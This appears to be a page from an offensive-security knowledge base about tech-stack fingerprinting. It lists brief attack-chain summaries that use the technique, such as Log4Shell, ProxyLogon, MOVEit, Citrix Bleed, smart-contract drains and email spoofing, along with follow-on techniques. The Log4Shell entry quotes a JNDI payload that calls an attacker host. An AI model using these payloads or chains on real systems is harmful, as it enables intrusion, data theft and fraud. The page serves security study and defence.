Tech Stack Fingerprinting

§ Where this technique fits

§ Dossiers chaining this technique

• Vesting beneficiary replace → silently drain stream

  Bug in a custom vesting contract allows anyone to call setBeneficiary on existing schedules. Replace beneficiary with attacker address; legitimate token stream now flows to attacker until released funds are noticed.

  step 1 / 5

• ERC-4337 paymaster sponsor drain

  A paymaster sponsors all UserOperations without per-user gas accounting. Spam tiny UserOps from many bundled addresses — paymaster pays the gas until its deposit hits zero.

  step 1 / 5

• Spring4Shell (CVE-2022-22965) → JSP webshell on Tomcat

  Send a crafted POST that uses Spring's data-binding to mutate Tomcat's logging configuration — turn its access log into a JSP file written under webapps/, then request it.

  step 1 / 6

• Uninitialised UUPS proxy implementation → brick contracts

  UUPS upgradeable contracts must initialise the implementation contract itself. If skipped, anyone can call `initialise()` and become its owner — then call `selfdestruct` to brick every proxy referencing it (Parity Multisig 2017).

  step 1 / 4

• Log4Shell (CVE-2021-44228) → RCE → lateral

  Send `${jndi:ldap://attacker/x}` in any logged field (User-Agent / X-Forwarded-For). Vulnerable log4j 2.x resolves the JNDI URL, fetches a Java class from attacker LDAP, runs it as the app user.

  step 1 / 6

• F5 BIG-IP iControl auth bypass (CVE-2022-1388) → root on LB

  Connection-header smuggle bypasses iControl REST auth, command-injection RCE as root. Load balancers see all traffic — recover TLS keys, session cookies, internal SSO config.

  step 1 / 6

• Apache Struts S2-045 (CVE-2017-5638) → Equifax-style breach

  Crafted Content-Type header is parsed as OGNL — execute commands as the app user. The 2017 Equifax breach origin: unpatched Struts endpoint exposed to the internet.

  step 1 / 5

• MOVEit Transfer (CVE-2023-34362) → mass data exfil (Cl0p)

  Pre-auth SQLi in MOVEit's web UI forges an admin session. .NET deserialisation chain drops a webshell as SYSTEM. Cl0p's 2023 mass-exfil playbook: download every file under /var/files.

  step 1 / 6

• Citrix Bleed → steal authenticated session → MFA bypass

  Send a long Host header to a vulnerable NetScaler — memory disclosure leaks an authenticated session token already past MFA. Replay the token to log into the corporate VPN.

  step 1 / 6

• Ivanti Pulse Connect Secure → pre-auth RCE → corporate VPN takeover

  Two-stage chain (auth bypass + command injection) lands root on the Pulse appliance. Exfil VPN configs, pivot through the tunnel into the corporate network.

  step 1 / 6

• FortiGate SSL-VPN pre-auth RCE → config theft

  Pre-auth heap overflow / format-string against FortiGate sslvpnd grants root on the appliance. Pull the running config, decrypt stored RADIUS / LDAP / VPN-user secrets.

  step 1 / 6

• Header smuggling → gateway sees vendor, mailbox sees attacker

  Crafted RFC-edge headers cause SPF/DMARC to validate against one From while Outlook renders the other — slips past Microsoft Defender / Proofpoint and lands as a 'verified' message.

  step 1 / 6

• AXFR → discover shadow-IT staging → exploitable web app

  DNS server allows unrestricted AXFR. Pull the full zone, find admin- / staging- / dev- hostnames never linked, hit one with default creds / leftover debug routes.

  step 1 / 6

• Permissive SPF / DMARC p=none → CEO impersonation BEC

  Target publishes SPF ~all and DMARC p=none. Send mail from attacker IP with a forged From: <ceo@target.com>; gateway delivers as-is. Combine with display-name spoof for a credible BEC.

  step 1 / 7

• Reentrancy → drain vault contract

  Vulnerable withdraw() sends ETH before updating balance. Attacker contract re-enters via fallback() until the vault is empty — the canonical DAO-2016 pattern.

  step 1 / 6

• Cross-chain bridge validator-set bypass → mint wrapped tokens

  Bridge's signature-set check is off-by-one (Nomad-class) or accepts a zero address (Ronin-class). Mint wrapped tokens on the destination chain without locking on the source.

  step 1 / 6

• Padding oracle → forge admin session cookie

  App encrypts session cookies with AES-CBC and reveals padding-validity via a 500/200 differential. Decrypt the cookie, forge an admin cookie, log in without credentials.

  step 1 / 6

• Flash loan + oracle manipulation → drain DEX

  DeFi contract reads spot price from a single pool. Borrow a flash loan, distort the pool, exploit the dependent contract while price is wrong, repay the loan in the same transaction.

  step 1 / 6

• ProxyShell → SYSTEM on Exchange → DA

  Pre-auth ProxyShell chain (path confusion + EWS email-to-PowerShell + arbitrary file write) deploys a webshell as SYSTEM. Same post-exploitation as ProxyLogon.

  step 1 / 6

• ProxyLogon → webshell on Exchange → DA

  Unauth SSRF + auth bypass against on-prem Exchange (CAS) — write a webshell as SYSTEM on the Exchange server, dump LSASS for cached domain creds, pivot to DA.

  step 1 / 6

• CVE-2024-21626 (Leaky Vessels) → container escape

  Outdated runc lets a malicious image escape during 'docker build' or 'docker run' via a leaked file descriptor pointing at the host filesystem.

  step 1 / 5

• Java deserialization → ysoserial → RCE

  An endpoint deserializes a Java object from user-controlled bytes. ysoserial produces a gadget chain whose readObject() reaches Runtime.exec().

  step 1 / 6

• Server-side prototype pollution → auth bypass → RCE

  Merge / clone helper on user input pollutes Object.prototype. A later code path reads `isAdmin` from a fresh object and gets true — then a child-process gadget reaches RCE.

  step 1 / 5

• SSTI (Jinja2) → sandbox escape → RCE

  User input rendered as a Jinja2 template instead of escaped. Escape the sandbox via __class__.__mro__ to reach subprocess and execute commands.

  step 1 / 6

• JWT RS256 → HS256 algorithm confusion → admin

  Server verifies any algorithm declared in the JWT header. Sign an HS256 token using the public RSA key as the HMAC secret — server accepts it as legit.

  step 1 / 6

• Unpatched Confluence (CVE-2023-22515) → internal foothold

  Internal Confluence instance reachable from the corporate VLAN. Trivial privilege-escalation CVE creates an admin user; webshell uploaded; pivot into AD service accounts.

  step 2 / 6

• SQLi (UNION) → DB dump → admin login

  Discover a UNION-based SQL injection on a search/listing endpoint, enumerate the schema, dump the users table, and authenticate as an admin.

  step 2 / 8

• Origin IP bypass → direct attack on backend

  Find the real origin IP behind the CDN via CT logs / DNS history / SSL fingerprinting. Connect directly to origin, bypassing WAF + caching + rate-limit; run noisy attacks (SQLi / RCE) that the edge would have blocked.

  step 3 / 6

§ What commonly comes next

1. 01
   API Endpoint Discovery

   W-RECON-API-DISCO · Reconnaissance
   seen 1×
2. 02
   Apache Struts Content-Type RCE (S2-045 / CVE-2017-5638)

   CVE-STRUTS-S2-045 · Initial Access
   seen 1×
3. 03
   Atlassian Confluence / Jira RCE

   SAAS-ATLAS-CVE · Initial Access
   seen 1×
4. 04
   CDN Origin Bypass

   CDN-ORIGIN-BYPASS · Defense Evasion
   seen 1×
5. 05
   Citrix Bleed (CVE-2023-4966)

   VPN-CITRIX-BLEED · Credential Access
   seen 1×
6. 06
   Cross-Chain Bridge Exploit

   W3-BRIDGE-EXPLOIT · Impact
   seen 1×
7. 07
   DMARC Bypass (p=none / sub-policy)

   EM-DMARC-BYPASS · Initial Access
   seen 1×
8. 08
   Deserialization — Java (ysoserial)

   W-DESER-JAVA · Execution
   seen 1×